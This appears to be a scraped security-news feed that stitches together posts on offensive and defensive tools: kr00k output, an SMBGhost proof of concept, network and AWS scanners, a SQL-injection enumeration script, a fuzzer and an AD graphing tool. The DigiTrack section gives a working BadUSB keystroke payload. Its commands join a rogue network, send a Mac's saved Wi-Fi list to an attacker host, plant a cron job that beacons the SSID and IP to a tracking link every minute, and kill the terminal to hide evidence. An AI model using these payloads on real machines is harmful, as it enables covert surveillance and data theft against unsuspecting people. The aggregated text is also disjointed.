| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/



/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1

https://hexway.io/research/r00kie-kr00kie/

[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 490
id = 756
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xd0ca
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34789
dport = 1337
seq = 3463744441
ack = 3909086929
dataofs = 8
reserved = 0
flags = PA
window = 1369
chksum = 0x65ee
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
load = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r \n\r\n'

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 42533
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x2f47
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34792
dport = 1337
seq = 71773087
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x97df
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 1460
id = 35150
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x46a6
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 36020
dport = 1337
seq = 395101552
ack = 1111748198
dataofs = 8
reserved = 0
flags = A
window = 1369
chksum = 0x35d2
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
load = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follo w all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 17897
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x8f83
src = 192.168.43.161
dst = 95.85.25.177
\options \
###[ TCP ]###
sport = 36266
dport = 1337
seq = 3375779416
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x2c7d
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]

[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap

Script: traffic_generator.py
This script generates UDP traffic from the victim, to demonstrate the kr00k attack
->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
Press Ctrl+C to exit


CVE-2020-0796 - CVE-2020-0796 Pre-Auth POC

$
0
0


(c) 2020 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes

POC to check for CVE-2020-0796 / "SMBGhost"
Expected outcome: Blue Screen
Intended only for educational and testing in corporate environments.
ZecOps takes no responsibility for the code, use at your own risk.
Please contact sales@ZecOps.com if you are interested in agent-less DFIR tools for Servers, Endpoints, and Mobile Devices to detect SMBGhost and other types of attacks automatically.


Usage

CVE-2020-0796-POC.exe [<TargetServer>]

If <TargetServer> is omitted, the POC is executed on localhost (127.0.0.1).


Compiled POC

You can get the compiled POC here.


Compiling

Use Visual Studio to compile the following projects:

  1. ProtoSDK\Asn1Base\Asn1Base.csproj
  2. ProtoSDK\MS-XCA\Xca.csproj
  3. ProtoSDK\MS-SMB2\Smb2.sln

Use the resulting exe file to run the POC.


References


CVE-2020-0796 - Windows SMBv3 LPE Exploit #SMBGhost

$
0
0

Pulsar - Network Footprint Scanner Platform - Discover Domains And Run Your Custom Checks Periodically

$
0
0

Pulsar is an automated network footprint scanner for Red Teams, Pentesters and Bounty Hunters. Its focused on discovery of organization public facing assets with minimal knowledge about its infrastructure. Along with network data visualization, it attempts to give a basic vulnerability score to find infrastructure weak points and their relation to other resources. It can be also used as a custom vulnerability scanner for wide and uncharted scopes. This software was created with availability and openness in mind, so it is 100% free, and does not require any API keys to use its features.
This is a beta release, be prepared to notice bugs or even crashes. Help me out and submitt an issue.

What it is not?
  • Vulnerability Management Platform
  • Full OSINT framework scanner
  • Speed oriented tool with immediate results
  • Stable enterprise product you can rely on (beta release)

Key features
  • Subdomains discovery
  • Cloud resources discovery
  • Basic vulnerability scanning
  • Scan policies & optimization
  • Data visualization
  • Collaboration & data export
  • Scheduling & notifications
  • REST API
  • External APIs integration
  • OAUTH integration
  • Custom scanner extensions

Integrated projects

Future ideas
  • Stability and speed improvements.
  • CLI client
  • More open source integrations.
  • More detailed scan settings.
  • IPv4 subnet discovery.
  • Additional confidence tests.
  • Additional frontend user controls.
  • Harvesting false positive metadata for machine learning model.

Installation instructions
If you would like to use External APIs see USAGE.md
In order to use email notifications, edit EMAIL_BACKEND SETTINGS in portal/portal/settings.py before the installation

Windows

Prerequisites
  1. Git-tools
  • Installer is available here.
  1. Docker engine and docker-compose
  • Docker installation instructions are available here.
  • docker-compose installation instructions are available here.
Prerequisites will be verified during installation process.

Installation
  1. Clone or download latest pulsar repository
git clone https://github.com/pulsar/
  1. Run powershell installer
PS> .\install.ps1
  1. Proceed with installer instructions
  2. Login to pulsar console at https://localhost:8443/ with generated default credentials

Linux

Prerequisites
  1. Git-tools Install git from package manager of your distribution, i.e.
sudo apt install git
  1. Docker engine and docker-compose
  • Docker installation instructions are available here.
  • Docker-compose installation instructions are available here.
Prerequisites will be verified during installation process.

Installation
  1. Clone or download latest pulsar repository
git clone https://github.com/pulsar/
  1. Run bash installer
# ./install.sh
  1. Proceed with installer instructions
  2. Login to pulsar console at https://localhost:8443/ with generated default credentials

Architecture
Pulsar is a PaaS based on docker-compose file with pre-installed requirements. Provided architecture can be easliy scaled, converted and deployed to multiple common cloud environments. Web application server is based on services such as Nginx, Gunicorn and Django Rest Framework.

Docker container structure

For more information seedocker-compose.yml

Contribution

In case of issues
  • Feel free to issue a bug report.
  • See troubleshooting section here.

In case of ideas
  • Feel free to issue a change request.
  • Feel free to issue a pull request.
  • Send me a private message.

In case you would like to see it hosted
  • I'm considering launching a funding campaign.

In case you like the idea
  • Star me and tell your friends!

In case of general criticism about code quality and architecture
  • You don't need to use it.
  • Feel free to issue a pull request.

Documentation

User guide
Basic usage guide can be found here.

REST API
Self describing API is available at /pulsar/api/v1/ endpoint.

Development
Currently the only available documentation is available at /admin/doc/ endpoint.
Full development documentation will be available in future release.


Awspx - A Graph-Based Tool For Visualizing Effective Access And Resource Relationships In AWS Environments

$
0
0




auspex [ˈau̯s.pɛks] noun: An augur of ancient Rome, especially one who interpreted omens derived from the observation of birds.
awspx is a graph-based tool for visualizing effective access and resource relationships within AWS. It resolves policy information to determine what actions affect which resources, while taking into account how these actions may be combined to produce attack paths. Unlike tools like Bloodhound, awspx requires permissions to function. It is not expected to be useful in cases where these privileges have not been granted.

Quick start
Install (see installation), load the sample database, and search for attacks:
awspx db --load-zip sample.zip
awspx attacks
OR run it against an environment of your own (attack information is included by default in this case):
awspx ingest
Browse to localhost and see what you can find!


Installation
awspx requires Docker.
git clone git@github.com:FSecureLABS/awspx.git
cd awspx && ./INSTALL

If it doesn't work out of the box, here are some things to check:
  • The docker container runs a Neo4j database that will forward TCP ports 7687, 7373 and 7474 to these same ports on localhost. If an existing Neo4j installation is present (e.g. BloodHound) awspx will fail. You will need to disable this service before continuing. Alternatively, you can modify network mappings yourself by editing INSTALL.
  • The docker container also forwards to TCP port 80, resulting in similar issues.
  • SELinux may prevent the docker container from doing everything it needs to. If you are running SELinux (props) and encounter issues, check SELinux.
  • Docker makes changes to iptables. You may need to adjust your iptables configuration to get awspx to work.

AWS permissions
The following AWS-managed policies can be used.
  • SecurityAudit will allow you to ingest everything except S3 objects.
  • Add ReadOnlyAccess to also ingest S3 objects (warning: this can be very slow).

Data collection
Once awspx has been installed, you can create a profile by running awspx profile --create my-account, or invoke the ingestor by running awspx ingest on the command line. By default the ingestor will utilise a profile called default unless you specify something else using --profile:
awspx ingest --profile my-other-account
If the profile my-other-account does not exist, you will prompted to enter a AWS access key ID and secret for it. You will also be prompted an output format, which you can ignore, and a region which is not important for IAM but required for other services. You can also create a profile this without ingesting any data by using awspx profile:
awspx profile --create work
Further commands and arguments are provided for tweaking ingestion and attack path computation, and for managing AWS profiles and Neo4j databases. Run awspx -h and awspx {profile|ingest|attacks|db} -h to learn more.
Supported services: IAM, EC2, S3, Lambda

Examples
awspx ingest --profile my-account --services S3
The ingestor will pull only S3 data using the my-account profile and store it in a database named my-account.db. Resource based policies (and Bucket ACLs in this case) will be processed automatically. Identify based policies will be ignored since IAM has been omitted from this list of services.
awspx ingest --profile my-account --services IAM EC2 --database db-for-ec2
The ingestor will pull only IAM and EC2 data, using the my-account profile, and store it in a database named db-for-ec2.db. Since IAM includes Identity based policies and assume role policy documents, this infromation will be included in db-for-ec2.db
awspx ingest --profile my-account \
--except-types AWS::S3::Object \
--except-arns arn:aws:s3:::broken-bucket arn:aws:ec2:eu-west-1:123456789012:instance/i-1234
awspx will pull data for all supported services using the my-account profile but will not attempt to load S3 objects. It will also skip the bucket named broken-bucket and the EC2 instance named i-1234. A full list of recognised resource types can be found in lib/aws/resources.py.
awspx ingest --profile my-account --skip-attacks
awspx will pull data for all supported services using the my-account profile but will not compute attacks. This can be useful for large environments. Attacks can be computed separately later on by running awspx attacks.
awspx attacks --only-attacks AssumeRole CreateGroup
Using the current database, awspx will only compute only the Assume Role and Create Group attacks.
awspx db --load-zip sample.zip
awspx will create a new database named sample from sample ZIP file. Files must be placed in /opt/awspx/data so that they can be accessed by the docker container. Note that attack information is not included with zip data. To include this information awspx attacks must be run after a zip has been loaded.
awspx db --use my-other-account
awspx will switch the database to my-other-account. You will need to refresh your browser to see the changes.

Using the frontend
Once you've loaded a database (hint: load the sample data by running awspx db --load-zip sample.zip) you can explore it by visiting localhost in your browser.
To get started, find a Resource (or Action) you're interested in and see where the path takes you (right click on Resources to bring up the context menu, left click to see its properties).

Action colors
Action Effect color palette:
  • Allow: Green edges
  • Deny: Red edges
  • Conditional: Dashed edges
Action Access Type color palette:
  • List: Yellow
  • Read: Pink
  • Write: Indigo
  • Tagging: Teal
  • Permissions Management: Purple
Actions are represented visually using a linear gradient comprised of the Effect and Access colors (in that order). Conditional attacks are presented using a dotted line.

Shortcut keys
KeyAction
Alt + EnterRerun Layout
TabSwitch between Actions and Resources search view
Ctrl + DragBox select
Ctrl + Left Clicktoggle selection
DeleteRemove selected nodes
EscapeClose properties
Ctrl + CCopy selection properties (JSON)
Ctrl + ASelect all
Ctrl + SOpen search bar

About
awspx was developed by Craig Koorn and David Yates using Python (ingestor); Neo4j (DB); and Vue (front-end); and Cytoscape (front-end graph visualization).


MSSQLi-DUET - SQL Injection Script For MSSQL That Extracts Domain Users From An Active Directory Environment Based On RID Bruteforcing

$
0
0

SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing. Supports various forms of WAF bypass techniques through the implementation of SQLmap tamper functions. Additional tamper functions can be incorporated by the user depending on the situation and environment.
Comes in two flavors: straight-up Python script for terminal use, or a Burp Suite plugin for simple GUI navigation.
Currently only supports union-based injection at the moment. More samples and test cases are required to fully test tool's functionality and accuracy. Feedback and comments are greatly welcomed if you encounter a situation it does not work.
Custom tailoring the script and plugin to your needs should not be too difficult as well. Be sure to read the Notes section for some troubleshooting.

Burp Suite Plugin
After loading the plugin into Burp Suite, right-click on a request and send it to MSSQLi-DUET. More details on the parameters and such are described below.
The request will populate in the request window, and only the fields above it need to be filled out. After hitting run the output will be placed in the results output box for easy copy pasting.

Python Script Usage

Script Help
python3 mssqli-duet.py -h
usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid
RID_RANGE [-ssl SSL] -p PARAMETER [-proxy PROXY]
[-o OUTFILE] -r REQUEST_FILE

MSSQLi-DUET - MSSQL (Injection-based) Domain User Enumeration Tool

optional arguments:
-h, --help show this help message and exit
-i INJECTION, --injection INJECTION
Injection point. Provide only the data needed to
escape the query.
-e ENCODING, --encoding ENCODING
Type of encoding: unicode, doubleencode, unmagicquotes
-t TIME_DELAY, --time_delay TIME_DELAY
Time delay for requests.
-rid RID_RANGE, --rid_range RID_RANGE
Hypenated range of RIDs to brute force. Ex: 1000-1200
-ssl SSL, --ssl SSL Add flag for HTTPS
-p PARAMETER, --parameter PARAMETER
Vulnerable parameter
-proxy PROXY, --proxy PROXY
Proxy connection string. Ex: 127.0.0.1:8080
-o OUTFILE, --outfile OUTFILE
Outfile for username enumeration results.
-r REQUEST_FILE, --request_file REQUEST_FILE
Raw request file saved from Burp

Prepare to be enumerated!

How to use
After identifying a union-based SQL injection in an application, copy the raw request from Burp Suite using the 'copy to file' feature.
Pass the saved request to DUET with the -r flag. Specify the vulnerable parameter and well as the point of injection. As an example, if the parameter "element" is susceptible to SQL injection, -p will be "element". DUET will build out all the SQL injection queries automatically, but specification for the initial injection needs to be provided. Meaning, if the injection occurs because of a single apostrophe after the parameter data, this is what would be specified for the -i argument.
Ex: test' 
test'))
test")"

Example
python3 mssqli-duet.py -i "carbon'" -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080
[+] Collected request data:
Target URL = http://192.168.11.22/search2.php?element=carbon
Method = GET
Content-Type = applcation/x-www-form-urlencoded


[+] Determining the number of columns in the table...
[!] Number of columns is 3
[+] Determining column type...
[!] Column type is null
[+] Discovering domain name...
[+] Domain = NEUTRINO
[+] Discovering domain SID...
S-1-5-21-4142252318-1896537706-4233180933-

[+] Enumerating Active Directory via SIDs...

NEUTRINO\HYDROGENDC01$
NEUTRINO\DnsAdmins
NEUTRINO\DnsUpdateProxy
NEUTRINO\HELIUM$
NEUTRINO\BORON$
NEUTRINO\BERYLLIUM$
NEUTRINO\aeinstein
NEUTRINO\bbobberson
NEUTRINO\csagan
NEUTRINO\ccheese
NEUTRINO\svc_web
NEUTRINO\svc_sql

Notes
The script may need to be modified depending on the casting and type limitations of the columns that are discovered.
This includes modifications to switch the column position of the payload, and also modifying the query strings themselves to account for column types that will not generate errors.
Additionally, the logic for determining the number of columns is currently not the greatest, and certain comparisons maybe need to be commented out to ensure proper determination takes place.
Overall, just take a look at the requests being sent in Burp and tailor the script as necessary to the SQL injection environment you find yourself in.

References
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/


FProbe - Take A List Of Domains/Subdomains And Probe For Working HTTP/HTTPS Server

$
0
0

FProbe - Fast HTTP Probe

Installation
GO111MODULE=on go get -u github.com/theblackturtle/fprobe

Features
  • Take a list of domains/subdomains and probe for working http/https server.
  • Optimize RAM and CPU in runtime.
  • Support special ports for each domain
  • Verbose in JSON format with some additional headers, such as Status Code, Content Type, Location.

Usage
Usage of fprobe:
-c int
Concurrency (default 50)
-i string
Input file (default is stdin) (default "-")
-l Use ports in the same line (google.com,2087,2086)
-p value
add additional probe (proto:port)
-s skip the default probes (http:80 and https:443)
-t int
Timeout (seconds) (default 9)
-v Turn on verbose

Basic Usage
Stdin input
❯ cat domains.txt | fprobe
File input
❯ fprobe -i domains.txt

Concurrency
❯ cat domains.txt | fprobe -c 200

Use inline ports
If you want to use special ports for each domain, you can use the -l flag. You can parse Nmap/Masscan output and reformat it to use this feature.
Input (domains.txt)
google.com,2087,2086,8880,2082,443,80,2052,2096,2083,8080,8443,2095,2053
yahoo.com,2087,2086,8880,2082,443,80,2052,2096,2083,8080,8443,2095,2053
sport.yahoo.com,2086,443,2096,2053,8080,2082,80,2083,8443,2052,2087,2095,8880
Command
❯ cat domains.txt | fprobe -l

Timeout
❯ cat domains.txt | fprobe -t 10

Special ports
❯ cat domains.txt | fprobe -p http:8080 -p https:8443

Use to check working urls
❯ echo 'https://google.com/path1?param=1' | fprobe

https://google.com/path1?param=1

Use the built-in ports collection (Include 80, 443 by default)
  • Medium: 8000, 8080, 8443
  • Large: 81, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888
  • XLarge: 81, 300, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 12443, 16080, 18091, 18092, 20720, 28017
❯ cat domains.txt | fprobe -p medium/large/xlarge

Skip default probes
If you don't want to probe for HTTP on port 80 or HTTPS on port 443, you can use the -s flag.
❯ cat domains.txt | fprobe -s

Verbose
The verbose output will be format in JSON format with some additional headers, such as Status Code, Content Type, Location.
❯ cat domains.txt | fprobe -v
{"site":"http://google.com","status_code":301,"server":"gws","content_type":"text/html; charset=UTF-8","location":"http://www.google.com/"}
{"site":"https://google.com","status_code":301,"server":"gws","content_type":"text/html; charset=UTF-8","location":"https://www.google.com/"}

Credit
This tool get the idea and some line of codes from httprobe written by @tomnomnom.



DigiTrack - Attacks For $5 Or Less Using Arduino

$
0
0

In 30 seconds, this attack can learn which networks a MacOS computer has connected to before, and plant a script that tracks the current IP address and Wi-Fi network every 60 seconds.

Now includes: Hardtracker - Digispark VPN buster to send the IP address and BSSID/SSID of nearby Wi-Fi networks on a MacOS computer to a Grabify tracker every 60 seconds.

This is a $5 attack that does a couple things:
  1. Inserts a Wi-Fi backdoor onto a victim computer, allowing you to capture the victim's data connection at any time when you are in Wi-Fi range.
  2. Steals a list of every network the victim has ever connected to (for tracking, classifying, and hijacking data connection)
  3. Inserts a tracking job that send the IP address and currently connected network to a Grabify link every 60 seconds.

Attack goes: A victim leaves a MacOS computer unattended for 30 seconds. The attacker inserts a DigiSpark board loaded with an attack payload. The payload looks like this (with delays and single key strokes removed):

DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");
  • We add the network "Sneakernet" to our trusted network list and connect to it.

DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H "Content-Type: text/plain" --data "$(networksetup -listpreferredwirelessnetworks en0)" 192.168.4.1 &");
  • After connecting, we send a CURL request listing every single network the MacOS computer has connected to in the past to the esp8266 creating the "Sneakernet" network. The & puts the process in the background in case it takes too long, and the -m sets a timer of 10 seconds to prevent it taking too long. Now we know which Wi-Fi networks the victim has joined, and which networks will force the computer to connect without asking.

DigiKeyboard.print("export VISUAL=nano; crontab -e");
  • We create a job that will execute every 60 seconds

DigiKeyboard.print("* * * * * curl --silent --output /dev/null --referer "$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')" https://grabi/YOURLINK");
  • We suppress the output of CURL, and grab the network name of the currently connected Wi-Fi network. We sent this along with a CURL request to a tracking URL, delivering the target's IP address and currently connected Wi-Fi network every 60 seconds.

DigiKeyboard.print("wait && kill -9 $(ps -p $PPID -o ppid=)");
  • Finally, we wait for all background processes to finish, and kill the shit out of the terminal window to hide the evidence.
Total run time is about 30 seconds, not including the few seconds the Digisparks waits for a sketch to upload.
Notes: Grabify may go into "I'm under attack" mode and not allow checkin. Look for this line: div class="cf-browser-verification cf-im-under-attack"
If you see it, then the IP address is being blocked by cloudflare.


Frida API Fuzzer - This Experimetal Fuzzer Is Meant To Be Used For API In-Memory Fuzzing

$
0
0

This experimental fuzzer is meant to be used for API in-memory fuzzing.
The design is highly inspired and based on AFL/AFL++.
ATM the mutator is quite simple, just the AFL's havoc and splice stages.
I tested only the examples under tests/, this is a WIP project but is known to works at least on GNU/Linux x86_64 and Android x86_64.
You need Frida >= 12.8.1 to run this (pip3 install -U frida) and frida-tools to compile the harness.

Usage
The fuzz library has to be imported into a custom harness and then compiled with frida-compile to generate the agent that frida-fuzzer will inject into the target app.
The majority of the logic of the fuzzer is in the agent.
A harness has the following format:
var fuzz = require("./fuzz");

var TARGET_MODULE = "test_linux64";
var TARGET_FUNCTION = DebugSymbol.fromName("target_func").address;;
var RET_TYPE = "void";
var ARGS_TYPES = ['pointer', 'int'];

var func_handle = new NativeFunction(TARGET_FUNCTION, RET_TYPE, ARGS_TYPES, { traps: 'all' });

fuzz.target_module = TARGET_MODULE;

var payload_mem = Memory.alloc(fuzz.config.MAX_FILE);

fuzz.fuzzer_test_one_input = function (/* Uint8Array */ payload) {

Memory.writeByteArray(payload_mem, payload, payload.length);

func_handle(payload_mem, payload.length);

}
fuzz.fuzzer_test_one_input is mandatory. If you don't specify fuzz.target_module, all the code executed will be instrumented.
You can also set fuzz.manual_loop_start = true to tell the fuzzer that you will call fuzz.fuzzing_loop() in a callback and so it must not call it for you (e.g. to start fuzzing when a button is clicked in the Android app).
The callback fuzz.init_callback can be set to execute code when the fuzzer is ready to begin. See tests/test_java.js for an example.
fuzz.dictionary is a classic fuzzer dictionary, an array in which you can add items (accepted types are Array, ArrayBuffer, Uint8Array, String) that are used as additional values in the mutator. See tests/test_libxml2.js for an example.
frida-fuzzer accepts the following arguments:
-i FOLDERFolder with initial seeds
-o FOLDEROutput folder with intermediate seeds and crashes
-UConnect to USB
-spawnSpawn and attach instead of simply attach
-script SCRIPTScript filename (default is fuzzer-agent.js)
If you don't specify the output folder, a temp folder is created under /tmp. If you don't specify the folder with the initial seed, an uninformed seed 0000 is used as starting seed.
If you are fuzzing a local application, you may want to execute system-config before frida-fuzzer to tune the parameters of your system and speed-up the things.
Running ./frida-fuzzer -spawn ./tests/test_linux64 you will see something like the following status screen on your terminal:


You can also easily add a custom stage in fuzz/fuzzer.js and add it to the stages list in fuzz/index.js.
To customize the fuzzer, edit fuzz/config.js. The variables that you may want to change are MAP_SIZE (If the code that you are fuzzing is small you can reduce it and gain a bit of speed), MAX_FILE (the maximum size of generated input) and QUEUE_CACHE_MAX_SIZE (increase the queue cache size for more speed, especially on Android).

Example
Let's fuzz the native shared library in the example Android app in tests.
Make sure you have root on your virtual device:
host$ adb root
Download the Android x86_64 frida-server from the repo release page and copy it on the device under /data/local/tmp (use adb push).
Start a shell and run the frida-server:
device# cd /data/local/tmp
device# ./frida-server
Now install the test app tests/app-debug.apk using the drag & drop into the emulator window.
Then, open the app.
Compile the agent script wiht frida-compile:
host$ frida-compile -x tests/test_ndk_x64.js -o fuzzer-agent.js
Open the app in the emulator.
Fuzz the test_func function of the libnative-lib.so library shipped with the test app with the command:
host$ ./frida-fuzzer -U -o output_folder/ com.example.ndktest1
Interesting testcases and crashes are both saved into output_folder.
Enjoy.


TODO
Hey OSS community, there are a lot of TODOs if someone wants to contribute.
  • Java code fuzzing (waiting for additional exposed methods in frida-java-bridge, should be easy, almost done)
  • splice stage (merge two testcase in queue and apply havoc on it)
  • support dictionaries (and so modify also havoc)
  • seed selection
  • inlined instrumentation for arm64
  • performance scoring (explore schedule of AFL)
  • structural mutator (mutate bytes based on a grammar written in JSON)
  • CompareCoverage (sub-instruction profiling to bypass fuzzing roadblocks)
  • rewrite frida-fuzzer in C with frida-core to be able to run all stuff on the mobile device
If you have doubt on one of this featues feel free to DM me on Twitter.
For features proposals, there is the Issues section.


Jackdaw - Tool To Collect All Information In Your Domain And Show You Nice Graphs

$
0
0

Jackdaw is here to collect all information in your domain, store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.

Example commands
Most of these commands are available already from the webapi, except for the database init.

DB init
jackdaw --sql sqlite:///<full path here>/test.db dbinit

Enumeration

Full enumeration with integrated sspi - windows only
jackdaw --sql sqlite:///test.db enum 'ldap+sspi://10.10.10.2' 'smb+sspi-ntlm://10.10.10.2'

Full enumeration with username and password - platform independent
The passowrd is Passw0rd!
jackdaw --sql sqlite:///test.db enum 'ldap://TEST\victim:Passw0rd!@10.10.10.2' 'smb+ntlm-password://TEST\victim:Passw0rd!@10.10.10.2'

LDAP-only enumeration with username and password - platform independent
The passowrd is Passw0rd!
jackdaw --sql sqlite:///test.db ldap 'ldap://TEST\victim:Passw0rd!@10.10.10.2'

Start interactive web interface to plot graph and access additional features
jackdaw --sql sqlite:///<FULL PATH TO DB> nest
Open http://127.0.0.1:5000/ui for the API
Please see the Building the UI section further down to learn how to build the UI. Once built:
Open http://127.0.0.1:5000/nest for the graph interface (shows the graph, but far from working)

Features

Data acquisition

via LDAP
LDAP enumeration phase acquires data on AD info, User, Machine, OU, Group objects which will be reprezented as a node in the graph, and as a separate table in the DB. Additionally all afforementioned objects' Security Descriptior will be parsed and the ACLs for the DACL added to the DB. This, together with the memebership information will be represented as edges in the garph. Additionally custom SQL queries can be performed on any of the afforementioned data types when needed.

via SMB
SMB enumeration phase acquires data on shares, localgroups, sessions, NTLM data via connecting to each machine in the domain (which is acquired via LDAP)

via LSASS dumps (optional)
The framework allows users to upload LSASS memory dumps to store credentials and extend the session information table. Both will be used as additional edges in the graph (shared password and session respectively). The framework also uses this information to create a password report on weak/shared/cracked credentials.

via DCSYNC results (optional)
The framework allows users to upload impacket's DCSYNC files to store credentials. This be used as additional edges in the graph (shared password). The framework also uses this information to create a password report on weak/shared/cracked credentials.

via manual upload (optional)
The framework allows manually extending the available DB in every aspect. Example: when user session information on a given computer is discovered (outside of the automatic enumeration) there is a possibility to manually upload these sessions, which will populate the DB and also the result graph

Graph
The framework can generate a graph using the available information in the database and plot it via the web UI (nest). Furthermore the graph generation and path canculations can be invoked programmatically, either by using the web API (/ui endpoint) or the grph object's functions.

Anomlaies detection
The framework can identify common AD misconfigurations without graph generation. Currently only via the web API.

User
User anomalies detection involve detection of insecure UAC permissions and extensive user description values. This feature set is expected to grow in the future as new features will be implemented.

Machine
Machine anomalies detection involve detection of insecure UAC permissions, non-mandatory SMB singing, outdated OS version, out-of-domain machines. This feature set is expected to grow in the future as new features will be implemented.

Password cracking
The framework is not performing any cracking, only organizing the hashes and the cracking results
currently main focus is on impacket and aiosmb's dcsync results !NT and LM hashes only!
Sample porcess is the following:
  1. Harvesting credentials as text file via impacket/aiosmb or as memory dumps of the LSASS process via whatever tool you see fit.
  2. Upload the harvested credentials via the API
  3. Poll uncracked hases via the API
  4. Crack them (hashcat?)
  5. Upload the results to the framework via the API
  6. Generate a report on the cracked/uncracked users and password strength and password sharing
note form author: This feature was implemented for both attackers and defenders. Personally I don't see much added value on either side, since at the point one obtained the NT hash of a user it's just as good as the password... Nonetheless, more and more companies are performing password strength excercises, and this feature would help them. As for attackers: it is just showing off at this point, but be my guest. Maybe scare management for extra points.

Important
This project is in experimental phase! This means multiple things:
  1. it may crash
